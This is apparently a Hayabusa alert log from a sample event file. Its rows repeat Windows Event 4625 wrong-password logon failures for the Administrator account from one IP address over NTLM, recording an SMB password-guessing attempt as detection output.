2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sE7pzfiKRfOb2dH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxL1cV8OiFVRfj4I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHs8Z8XPLg58jZ1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6kRLlJt3Oxwhdgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s4kTwriHAKVsTqzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jfitpZ5ZrzBfpNf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdcU6ypEEeIAugGI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jIMfGIU1pHasO88g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHsxKEQK7CWSqprp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QkC70klP6mv8YZrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v3YM3zaZk64qqq7K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mOLbk23zOqQLZYZU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0tlyXqvCQJVqaB5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: npjQlHcGls5gENng | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7buinUqketmW3Ib6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rs5gYGs6JBf2yV1J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 
01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67hYMvtmbrmv5LHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtV42zBnWwRCLfJS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jnaPNm28FvbFfM8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCEvKO14gPFHAZIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iJJyXCm1YOI2uIAS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MNAScx4qMKxCJQdU | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKTHsNA29ZnPHCHQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CjvAb3sjN0PM8my4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wYQ6HuRSMh8DXzMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZgejUxgojDE1kR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2L4yO411OUnkRGWQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: O3mGCNGFML75P7w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6CBslPz31UACz0wR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4Y8V0wB6unpmFXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXSbx81GD6dYgHtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWbnppJfJ0Ll9oLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoUjizV5iXImPGTe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHNG9oylnT46IObg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LUeAisNPQULjD2t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2sB5MlRw4Ox1OWdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WaklWtKd8QByH8M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nzvyy6CUk43SVxZW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xeolvnD92qP1dJPO | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDvRwPbu6yQH2pEf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxKdofXKKkCLn2n6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkO9p50Q9iFolbmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p01SZCA784xmPMe2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XKaI3FHBbBXvVsES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: mmUk6sW8QreDIZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0w9SSWaaTX7chM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 46vgsyX5Wxn2rupf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PV8628a8GNKoFyzM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mksBFEFzkC08dB4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U6QlHT6Bp63JDehd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRj4fxcRY0Esegl6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dj6zQjZwGEBo0zNt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imfY1T2VMoaqDSUd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvPP8UYn9fLpRYl4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFTGQ5tzNI5k58cK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8Zj3g1WiTLx8OlJ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x2Lr6j8Qt4xEmZZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BeDRsguCovO47lKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KqrDyaFTewMPSzD9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nBVMAki1Ghpknf6p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXKhNUmBUQBTyeNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: d1g9TVwsweaBfZgE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kWymb6ucohaBB60b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjL0zwlZofVuWhGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxsdzkJdnaZs5eKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PR6EpKvbqMeoQlKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZ3LMTtsVNI1gRO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75bNeXwYSZPhJdJ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lH6TVXSqJb1qLd3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edDWye6c2UhKznR6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxKUl1lynGY1ectn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vI5yUgukPBVRorJI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmR29QcBKMGVQ8rB | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7luV5GfiT0v0h7D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yA7pIDFgQbLIInqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:38.257 